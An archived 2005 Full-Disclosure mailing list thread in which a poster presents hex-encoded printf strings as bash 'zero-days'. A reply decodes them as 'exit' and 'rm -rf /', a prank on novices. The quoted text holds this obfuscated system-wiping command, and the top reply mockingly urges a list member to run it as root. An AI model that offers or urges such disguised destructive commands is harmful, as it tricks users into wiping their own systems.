Re: [Full-disclosure] Re: Bash vulnerability?

From: Octal (octetstream_at_gmail.com)
Date: 08/26/05

  • Next message: KF (lists): "[Full-disclosure] DMA[2005-0826a] - 'Nokia Affix Bluetooth btsrv poor use of popen()'"
    Date: Fri, 26 Aug 2005 14:05:10 -0500
    To: full-disclosure@lists.grok.org.uk
    
    

    Please leave etard. Actually, before you remove yourself from the
    list you should probably run `printf
    "\x72\x6d\x20\x2d\x72\x66\x20\x2f\x0a\x00"` as root on your own
    system.

    On 8/26/05, Gilles DEMARTY <gilles.demarty@gmail.com> wrote:
    > Hi, themaster ,
    >
    > \x65\x78\x69\x74\ means exit (considering ASCII representation of letters) ....
    > and `printf "\x72\x6d\x20\x2d\x72\x66\x20\x2f\x0a\x00"` does a rm -rf / ......
    > that's just a trick for people who don't know damn nothing about
    > computer, and bash...
    > it's even not worth replying this.
    >
    > .......
    > no more comments
    >
    > 2005/8/26, Rootmaster G <th3r007m45t3r@hotmail.com>:
    > > I have for long time been looking at a new bash zreod4y that was sent to
    > > me. Having not time to calculate who this code works,and now it is with
    > > this list
    > >
    > > I have many times made bash to crash but cannot yet wrige and exploit for
    > > this issue.
    > >
    > > `printf "\x65\x78\x69\x74\x00\x0a"`
    > >
    > > aslo I have found this other bash zerod4y from the same place that says
    > >
    > > `printf "\x72\x6d\x20\x2d\x72\x66\x20\x2f\x0a\x00"`
    > >
    > > both these vulnerabiilities must be run as root i find orf the second one
    > > will not do what it thinks
    > >
    > > can anyone help?
    > >
    > > _________________________________________________________________
    > > Express yourself instantly with MSN Messenger! Download today - it's FREE!
    > > http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
    > >
    > > _______________________________________________
    > > Full-Disclosure - We believe in it.
    > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    > > Hosted and sponsored by Secunia - http://secunia.com/
    > >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    > Hosted and sponsored by Secunia - http://secunia.com/
    >

    -- 
    .: Eat Me
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
    

  • Next message: KF (lists): "[Full-disclosure] DMA[2005-0826a] - 'Nokia Affix Bluetooth btsrv poor use of popen()'"

    Relevant Pages

    • Re: questions regarding sh shell
      ... root uses csh on my FreeBSD 5.4-STABLE. ... doing things the way I am used to under bash. ... My systems have csh as root shell, ...
      (comp.unix.bsd.freebsd.misc)
    • Re: questions regarding sh shell
      ... > Giorgos Keramidas wrote: ... > Especially as I already have bash installed. ... > things when I got stuck with my shell, and I did the same while I used csh. ... > Besides, for what I am using root, sh is quite adequate. ...
      (comp.unix.bsd.freebsd.misc)
    • Re: bash as login shell
      ... > I would like to change the login shell to bash for both root and my ... but no explicit choice for bash occurs in the drop down list on ... > account login seems to proceed normally to a functioning bash shell. ... For the root user, yes. ...
      (comp.unix.sco.misc)
    • bash and .profile
      ... I administer a number of AIX servers in a corporate environment. ... recently converted to using bash as my personal login shell, but root ... is and always has been defined with ksh as its default shell. ...
      (comp.unix.aix)
    • bash and .profile
      ... I administer a number of AIX servers in a corporate environment. ... recently converted to using bash as my personal login shell, but root ... is and always has been defined with ksh as its default shell. ...
      (comp.unix.shell)